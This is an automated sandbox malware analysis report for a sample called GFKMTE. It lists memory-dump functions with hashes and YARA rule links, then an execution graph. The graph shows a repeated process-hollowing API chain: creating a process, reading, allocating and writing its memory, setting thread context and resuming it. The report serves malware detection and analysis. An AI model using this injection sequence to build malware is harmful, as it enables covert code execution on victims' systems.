                                                                                                                                                  • Instruction Fuzzy Hash: A1213D34A0020ADFDB11DF68F448A8D7FF1FB49304F0085AAD504AF666E7796D4ADB91
                                                                                                                                                  Function 03050848 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ea60928922469833c3b7a281c11e442d9413c081f0a61cb732bf82266295f061
                                                                                                                                                  • Instruction ID: c3e381fb32b83377c4d8985af2ff2b42fcf5391e34d729a0433545f36719552a
                                                                                                                                                  • Opcode Fuzzy Hash: ea60928922469833c3b7a281c11e442d9413c081f0a61cb732bf82266295f061
                                                                                                                                                  • Instruction Fuzzy Hash: 6A113034E0020ADFDB10EF68F448A8D7BF1FB44305F0055A5D505AF666E7746D4ADB91
                                                                                                                                                  Function 0157D149 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2516818851.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_157d000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7b546f70fab568b50c9049add3879628a90fad646a6914cc5c2febcdd10daf27
                                                                                                                                                  • Instruction ID: fbfa5c2bad9c60525a41210f1af3484c5971bc8f91f1f78624e85cc1feeb0b83
                                                                                                                                                  • Opcode Fuzzy Hash: 7b546f70fab568b50c9049add3879628a90fad646a6914cc5c2febcdd10daf27
                                                                                                                                                  • Instruction Fuzzy Hash: 5701F7311043409AF7209A55FC8572ABFE8EF81231F08C52AED090E282C2799845CAB2
                                                                                                                                                  Function 03052020 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b671c95903ec586196368dc4780a8ffe6705908395d5cd0b726aff100634b1b5
                                                                                                                                                  • Instruction ID: 1121d1ecb91f6ea35c1e8882c0d8e72d153c985413ad1c1653353d31e61ab532
                                                                                                                                                  • Opcode Fuzzy Hash: b671c95903ec586196368dc4780a8ffe6705908395d5cd0b726aff100634b1b5
                                                                                                                                                  • Instruction Fuzzy Hash: F1016232D112099FDB54CB24C814AFFBBF5AF84320F15892DA442A7251DE715946CB92
                                                                                                                                                  Function 03053421 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c5c0f0f8ddbb8d0563ee7f48387106aaf34c47760714094039a128d1290d621b
                                                                                                                                                  • Instruction ID: 2d51d162ee99918eccc5bb7389f8fb6ddb0a401408aaf4b634eebc9cfb76ce51
                                                                                                                                                  • Opcode Fuzzy Hash: c5c0f0f8ddbb8d0563ee7f48387106aaf34c47760714094039a128d1290d621b
                                                                                                                                                  • Instruction Fuzzy Hash: FE011A70900209DFCB15DBA4D580A9DFBF1EF86310F1486E9C4046B265D731AE45DB41
                                                                                                                                                  Function 03051870 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e96765b4fb3591e07d6cab24f75a94021f3b0e50e8309ca6e72325a30467b271
                                                                                                                                                  • Instruction ID: 6379627885a264f3974423bf0013798d5394896e667cc264867481c09dd3ea95
                                                                                                                                                  • Opcode Fuzzy Hash: e96765b4fb3591e07d6cab24f75a94021f3b0e50e8309ca6e72325a30467b271
                                                                                                                                                  • Instruction Fuzzy Hash: 4CF03C74D05249DBCF24CFA5E4143FEBBF4AB89314F00546AD915B6241D77C0A49CF54
                                                                                                                                                  Function 03051DC9 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4af5ead424d16a3a3c46cf868c500307b5329c2da737c516161c8eabe682d7d6
                                                                                                                                                  • Instruction ID: 326a45ce442d3ee3df630c1a975a1227cc8c8b1c858c7ff407264b2b4928cc38
                                                                                                                                                  • Opcode Fuzzy Hash: 4af5ead424d16a3a3c46cf868c500307b5329c2da737c516161c8eabe682d7d6
                                                                                                                                                  • Instruction Fuzzy Hash: B6F09631A45240AFC755CB19D804E6FBBFAEFCA210315C15BF888C7206D6709802CB51
                                                                                                                                                  Function 03051FE8 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9b41d302f7e8967051fd176eefac2641049e57dea4f5fbf8c5cb0f14e71b2e7c
                                                                                                                                                  • Instruction ID: fcaa19c6fd4f96e4c5b831e04089a97e01d5d337e0f5bcc297b7fe75a7a1feb8
                                                                                                                                                  • Opcode Fuzzy Hash: 9b41d302f7e8967051fd176eefac2641049e57dea4f5fbf8c5cb0f14e71b2e7c
                                                                                                                                                  • Instruction Fuzzy Hash: FDF0F072C0630ADFC725CFA4D455BAFBFB8AF01310F1448AAD402EB2A6CB706949DB51
                                                                                                                                                  Function 0157D148 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2516818851.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_157d000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5073bc5446dc2e3ee531f7307b8d765636e325b5b5144fa6651a27dbcd4d23b3
                                                                                                                                                  • Instruction ID: 57632217937df3da6d491ef0fe51ac9de3507aaa4e31d6c757fa3602f0c97784
                                                                                                                                                  • Opcode Fuzzy Hash: 5073bc5446dc2e3ee531f7307b8d765636e325b5b5144fa6651a27dbcd4d23b3
                                                                                                                                                  • Instruction Fuzzy Hash: C1F09671504344AEF7209A1AEC85B66FFA8EF81734F18C55AED484F287C279A844CBB1
                                                                                                                                                  Function 030509DF Relevance: .0, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 04a27328e431824f1d91ea5da02337682d584f3ff6a0897601df421da307b74a
                                                                                                                                                  • Instruction ID: 92511ae26b228c78ba096162aa752562c1b9c8f666048278579acff4c24ae328
                                                                                                                                                  • Opcode Fuzzy Hash: 04a27328e431824f1d91ea5da02337682d584f3ff6a0897601df421da307b74a
                                                                                                                                                  • Instruction Fuzzy Hash: E801F270C0420AEFCB41EFA8D854A9DBBF0FF05310F1445AAC825AB291EB748A84DB81
                                                                                                                                                  Function 03051DD8 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3e3f08bf2ccc860aa64ad1f7a3abf386760b7a708bc08091cabec25c3fa0689c
                                                                                                                                                  • Instruction ID: 0dde63eee10a2fcf90b487c719f2000b3c79fdb6ea2b97e20b9c91288756d418
                                                                                                                                                  • Opcode Fuzzy Hash: 3e3f08bf2ccc860aa64ad1f7a3abf386760b7a708bc08091cabec25c3fa0689c
                                                                                                                                                  • Instruction Fuzzy Hash: F8E06571B05104AF8758DA5AE404E6FBBEAFBCD260714C16AF848C7305DB71DC42C790
                                                                                                                                                  Function 030509F0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: cad04c7ddab874b93891d0dbb652907094eb8d63800fd3a931ebe80f01b7e935
                                                                                                                                                  • Instruction ID: f7ade6f79aed8f04f6324c2a2f42602436d0d38e1e246491e58b3a3c27df71c9
                                                                                                                                                  • Opcode Fuzzy Hash: cad04c7ddab874b93891d0dbb652907094eb8d63800fd3a931ebe80f01b7e935
                                                                                                                                                  • Instruction Fuzzy Hash: 12F0B270C01209EFCB54EFB8D544AAEBBF4FB05300F1046AAD825A7394EB709A44DB80
                                                                                                                                                  Function 0305339F Relevance: .0, Instructions: 23COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5e4f1bb244b617ad797d0685394572a0f92c573bebf2d42373925269efb3b7fa
                                                                                                                                                  • Instruction ID: 2acf4bd8e8a2442f5cd0cfa75f58db4d7d8781214b148c8436e1ac887d571b3b
                                                                                                                                                  • Opcode Fuzzy Hash: 5e4f1bb244b617ad797d0685394572a0f92c573bebf2d42373925269efb3b7fa
                                                                                                                                                  • Instruction Fuzzy Hash: B8E0E574E01248CBCB28DF9AE8414ADBBB1FFC8324B109565E015AB264D6309912CB45
                                                                                                                                                  Function 030546BE Relevance: .0, Instructions: 20COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000017.00000002.2518635520.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_23_2_3050000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 29f329412e9f9b7d3c0f7cc73e02570e58455cef0a4ae46c7f741c0ebdd2bc73
                                                                                                                                                  • Instruction ID: 12b62da6c0148e4c0f77e69f07b4348d3b643993827c1b27ed596ea86a22d24b
                                                                                                                                                  • Opcode Fuzzy Hash: 29f329412e9f9b7d3c0f7cc73e02570e58455cef0a4ae46c7f741c0ebdd2bc73
                                                                                                                                                  • Instruction Fuzzy Hash: A6E04638E0420C9BCB24CF9AD8405DDF772AFC2220F0092A6D499BF254D7308916CB45

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 04CF0B60 Relevance: 2.0, Strings: 1, Instructions: 765COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000018.00000002.1496338973.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_24_2_4cf0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: dq
                                                                                                                                                  • API String ID: 0-4057445327
                                                                                                                                                  • Opcode ID: 96f4327f8fefebd3a3fcdab1e0c511db4246e6efb0c6592a8f5114cd5648d1fb
                                                                                                                                                  • Instruction ID: b9e81b9151b84e564d64e7b0cc5a25d67e95f6c5a3f8c17ec5cc13380175b956
                                                                                                                                                  • Opcode Fuzzy Hash: 96f4327f8fefebd3a3fcdab1e0c511db4246e6efb0c6592a8f5114cd5648d1fb
                                                                                                                                                  • Instruction Fuzzy Hash: 9D82A474E00228CFCB24CF69D884BDDBBB5BF49304F1486A6D509AB265DB74AE85CF50
                                                                                                                                                  Function 04CF05E7 Relevance: .6, Instructions: 566COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000018.00000002.1496338973.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_24_2_4cf0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e9c3c7937d17a5a4e25dc48d37429d28888308043976d63015a5105e448c12cf
                                                                                                                                                  • Instruction ID: 1a2e460d3e1473c5daf90c3a70db23e5a02f6760fd5b7928ae20a47a2ba1b64d
                                                                                                                                                  • Opcode Fuzzy Hash: e9c3c7937d17a5a4e25dc48d37429d28888308043976d63015a5105e448c12cf
                                                                                                                                                  • Instruction Fuzzy Hash: 6F419C709097858FEB13EF64E8A47887FB1EF42305F0545DAC0458F2A7D778294ACB92
                                                                                                                                                  Function 04CF0A49 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000018.00000002.1496338973.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_24_2_4cf0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f7348ca18863001766df6b553b84f2eb97167948bb2addf2dccdb9ab8542cd0b
                                                                                                                                                  • Instruction ID: 4bbfb2d78dfbf5153933fd583187b53cd6405f6f610b4661ee48846f360ad927
                                                                                                                                                  • Opcode Fuzzy Hash: f7348ca18863001766df6b553b84f2eb97167948bb2addf2dccdb9ab8542cd0b
                                                                                                                                                  • Instruction Fuzzy Hash: BC216A71E0024A9FCF05DFA9D840ADDBBB1EF49310F8582A6D514BB262DB30A946CF90
                                                                                                                                                  Function 04CF0848 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000018.00000002.1496338973.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_24_2_4cf0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 1deefee58ea6c7b44401654dbb31f4586bc6a13dde295cf5c92cae36151bee1e
                                                                                                                                                  • Instruction ID: 1a4caae7e1ff32aa2863f55b75a5381a693c0ecafb623b864813e44c13c27f50
                                                                                                                                                  • Opcode Fuzzy Hash: 1deefee58ea6c7b44401654dbb31f4586bc6a13dde295cf5c92cae36151bee1e
                                                                                                                                                  • Instruction Fuzzy Hash: 88113074D00709DFDB15EF64E884B8D7BB5FB44705F0086A8D1099F269EBB46A4ACF81
                                                                                                                                                  Function 04CF1870 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000018.00000002.1496338973.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_24_2_4cf0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 34885a5adde407db64432d0c120c70060e58c8722110fa76accca6138eb3e6ee
                                                                                                                                                  • Instruction ID: 3c1ff5ee3c234ee65ae70f539ea8a65a3dcc59d688b06f646284382e4de2559f
                                                                                                                                                  • Opcode Fuzzy Hash: 34885a5adde407db64432d0c120c70060e58c8722110fa76accca6138eb3e6ee
                                                                                                                                                  • Instruction Fuzzy Hash: 29F044B5D04219DBDF10DFA6D9043EEBBF1AB89310F885065CA14B7251DB7C5A0ADFA0
                                                                                                                                                  Function 04CF09DF Relevance: .0, Instructions: 31COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000018.00000002.1496338973.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_24_2_4cf0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2d33f5caa6d46d34e39e12e37c0d22f75035dc9884fd92c257a0e721ef794679
                                                                                                                                                  • Instruction ID: 979f689cc2516b8e534eeae42e647278d6392e785bcc7561cd9ff28bd158c7f1
                                                                                                                                                  • Opcode Fuzzy Hash: 2d33f5caa6d46d34e39e12e37c0d22f75035dc9884fd92c257a0e721ef794679
                                                                                                                                                  • Instruction Fuzzy Hash: 7B013C70804249DFCB16CFA8D85469DBFB1FF06314F1446EED4555B2A2EB355A41CB81
                                                                                                                                                  Function 04CF09F0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000018.00000002.1496338973.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_24_2_4cf0000_GFKMTE.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2d7187936d9348d38135345338d8c1c2973feabc4fcaaaba49d228d43b037237
                                                                                                                                                  • Instruction ID: d3ad15d3ffd00a7f2df9e3a2ef89c2bd58871cedde082691693ff4ec7fa9ee95
                                                                                                                                                  • Opcode Fuzzy Hash: 2d7187936d9348d38135345338d8c1c2973feabc4fcaaaba49d228d43b037237
                                                                                                                                                  • Instruction Fuzzy Hash: 15F0B770C00209EFCB44DFB8D94069DBBF5FB05300F1046AAD415A7295EB749A44CF80

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:18.9%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                  Total number of Nodes:258
                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                  execution_graph 16634 298dfd8 16635 298dff4 16634->16635 16646 50880d8 16635->16646 16686 50880e8 16635->16686 16636 298e0bd 16726 508a6e0 16636->16726 16742 508aba3 16636->16742 16768 508a6d1 16636->16768 16637 298e11f 16784 508b5d8 16637->16784 16824 508b5c8 16637->16824 16638 298e181 16647 508811c 16646->16647 16864 50821a4 16647->16864 16649 508829b 16668 5089358 NtReadVirtualMemory NtReadVirtualMemory 16649->16668 16650 50882d3 16672 5089358 NtReadVirtualMemory NtReadVirtualMemory 16650->16672 16651 5088317 16680 508a208 NtResumeThread 16651->16680 16681 508a200 NtResumeThread 16651->16681 16652 50883d4 16685 5089358 NtReadVirtualMemory NtReadVirtualMemory 16652->16685 16653 5088496 16664 508a308 VirtualAllocEx 16653->16664 16665 508a300 VirtualAllocEx 16653->16665 16654 50884d4 16671 5089358 NtReadVirtualMemory NtReadVirtualMemory 16654->16671 16655 5088633 16673 508a428 NtWriteVirtualMemory 16655->16673 16674 508a420 NtWriteVirtualMemory 16655->16674 16656 508866f 16677 5089358 NtReadVirtualMemory NtReadVirtualMemory 16656->16677 16657 50889f7 16666 508a579 NtSetContextThread 16657->16666 16667 508a580 NtSetContextThread 16657->16667 16658 5088a8c 16678 508a428 NtWriteVirtualMemory 16658->16678 16679 508a420 NtWriteVirtualMemory 16658->16679 16659 5088b38 16684 5089358 NtReadVirtualMemory NtReadVirtualMemory 16659->16684 16660 5088b86 16669 508a579 NtSetContextThread 16660->16669 16670 508a580 NtSetContextThread 16660->16670 16661 50886ce 16661->16657 16675 508a428 NtWriteVirtualMemory 16661->16675 16676 508a420 NtWriteVirtualMemory 16661->16676 16662 5088c65 16682 508a208 NtResumeThread 16662->16682 16683 508a200 NtResumeThread 16662->16683 16663 5088d19 16663->16636 16664->16654 16665->16654 16666->16658 16667->16658 16668->16650 16669->16662 16670->16662 16671->16655 16672->16651 16673->16656 16674->16656 16675->16661 16676->16661 16677->16661 16678->16659 16679->16659 16680->16652 16681->16652 16682->16663 16683->16663 16684->16660 16685->16653 16687 508811c 16686->16687 16688 50821a4 CreateProcessW 16687->16688 16689 508829b 16688->16689 16868 5089358 16689->16868 16691 5088317 16873 508a208 16691->16873 16877 508a200 16691->16877 16692 50883d4 16704 5089358 2 API calls 16692->16704 16693 5088496 16881 508a308 16693->16881 16885 508a300 16693->16885 16694 50884d4 16712 5089358 2 API calls 16694->16712 16695 5088633 16889 508a428 16695->16889 16893 508a420 16695->16893 16696 508866f 16718 5089358 2 API calls 16696->16718 16697 50889f7 16897 508a579 16697->16897 16901 508a580 16697->16901 16698 5088a8c 16719 508a428 NtWriteVirtualMemory 16698->16719 16720 508a420 NtWriteVirtualMemory 16698->16720 16699 5088b38 16725 5089358 2 API calls 16699->16725 16700 5088b86 16710 508a579 NtSetContextThread 16700->16710 16711 508a580 NtSetContextThread 16700->16711 16701 50886ce 16701->16697 16716 508a428 NtWriteVirtualMemory 16701->16716 16717 508a420 NtWriteVirtualMemory 16701->16717 16702 5088c65 16723 508a208 NtResumeThread 16702->16723 16724 508a200 NtResumeThread 16702->16724 16703 5088d19 16703->16636 16704->16693 16710->16702 16711->16702 16712->16695 16713 5089358 2 API calls 16713->16691 16716->16701 16717->16701 16718->16701 16719->16699 16720->16699 16723->16703 16724->16703 16725->16700 16727 508a714 16726->16727 16913 50822ec 16727->16913 16729 508a893 16737 508b368 NtReadVirtualMemory NtReadVirtualMemory 16729->16737 16730 508a8cb 16741 508b368 NtReadVirtualMemory NtReadVirtualMemory 16730->16741 16731 508a90f 16738 508a208 NtResumeThread 16731->16738 16739 508a200 NtResumeThread 16731->16739 16732 508a9cb 16740 508b368 NtReadVirtualMemory NtReadVirtualMemory 16732->16740 16733 508aa8d 16735 508a308 VirtualAllocEx 16733->16735 16736 508a300 VirtualAllocEx 16733->16736 16734 508aacb 16735->16734 16736->16734 16737->16730 16738->16732 16739->16732 16740->16733 16741->16731 16743 508abb5 16742->16743 16917 508b368 16743->16917 16745 508ac66 16759 508b368 2 API calls 16745->16759 16746 508afee 16757 508a579 NtSetContextThread 16746->16757 16758 508a580 NtSetContextThread 16746->16758 16747 508b081 16760 508a428 NtWriteVirtualMemory 16747->16760 16761 508a420 NtWriteVirtualMemory 16747->16761 16748 508b12d 16764 508b368 2 API calls 16748->16764 16749 508b17b 16765 508a579 NtSetContextThread 16749->16765 16766 508a580 NtSetContextThread 16749->16766 16750 508acc5 16750->16746 16753 508a428 NtWriteVirtualMemory 16750->16753 16754 508a420 NtWriteVirtualMemory 16750->16754 16751 508b259 16762 508a208 NtResumeThread 16751->16762 16763 508a200 NtResumeThread 16751->16763 16752 508b30c 16752->16637 16753->16750 16754->16750 16755 508a428 NtWriteVirtualMemory 16755->16745 16756 508a420 NtWriteVirtualMemory 16756->16745 16757->16747 16758->16747 16759->16750 16760->16748 16761->16748 16762->16752 16763->16752 16764->16749 16765->16751 16766->16751 16769 508a714 16768->16769 16770 50822ec CreateProcessW 16769->16770 16771 508a893 16770->16771 16777 508b368 2 API calls 16771->16777 16772 508a8cb 16781 508b368 2 API calls 16772->16781 16773 508a90f 16778 508a208 NtResumeThread 16773->16778 16779 508a200 NtResumeThread 16773->16779 16774 508a9cb 16780 508b368 2 API calls 16774->16780 16775 508aa8d 16782 508a308 VirtualAllocEx 16775->16782 16783 508a300 VirtualAllocEx 16775->16783 16776 508aacb 16777->16772 16778->16774 16779->16774 16780->16775 16781->16773 16782->16776 16783->16776 16785 508b60c 16784->16785 16922 508238c 16785->16922 16787 508b78b 16815 508c263 NtReadVirtualMemory NtReadVirtualMemory 16787->16815 16788 508b7c3 16819 508c263 NtReadVirtualMemory NtReadVirtualMemory 16788->16819 16789 508b807 16805 508a208 NtResumeThread 16789->16805 16806 508a200 NtResumeThread 16789->16806 16790 508b8c3 16810 508c263 NtReadVirtualMemory NtReadVirtualMemory 16790->16810 16791 508b985 16811 508a308 VirtualAllocEx 16791->16811 16812 508a300 VirtualAllocEx 16791->16812 16792 508b9c3 16818 508c263 NtReadVirtualMemory NtReadVirtualMemory 16792->16818 16793 508bb22 16822 508a428 NtWriteVirtualMemory 16793->16822 16823 508a420 NtWriteVirtualMemory 16793->16823 16794 508bb5e 16802 508c263 NtReadVirtualMemory NtReadVirtualMemory 16794->16802 16795 508bee6 16813 508a579 NtSetContextThread 16795->16813 16814 508a580 NtSetContextThread 16795->16814 16796 508bf79 16803 508a428 NtWriteVirtualMemory 16796->16803 16804 508a420 NtWriteVirtualMemory 16796->16804 16797 508c025 16809 508c263 NtReadVirtualMemory NtReadVirtualMemory 16797->16809 16798 508c073 16816 508a579 NtSetContextThread 16798->16816 16817 508a580 NtSetContextThread 16798->16817 16799 508bbbd 16799->16795 16820 508a428 NtWriteVirtualMemory 16799->16820 16821 508a420 NtWriteVirtualMemory 16799->16821 16800 508c151 16807 508a208 NtResumeThread 16800->16807 16808 508a200 NtResumeThread 16800->16808 16801 508c204 16801->16638 16802->16799 16803->16797 16804->16797 16805->16790 16806->16790 16807->16801 16808->16801 16809->16798 16810->16791 16811->16792 16812->16792 16813->16796 16814->16796 16815->16788 16816->16800 16817->16800 16818->16793 16819->16789 16820->16799 16821->16799 16822->16794 16823->16794 16825 508b5d1 16824->16825 16826 508238c CreateProcessW 16825->16826 16827 508b78b 16826->16827 16926 508c263 16827->16926 16829 508b807 16845 508a208 NtResumeThread 16829->16845 16846 508a200 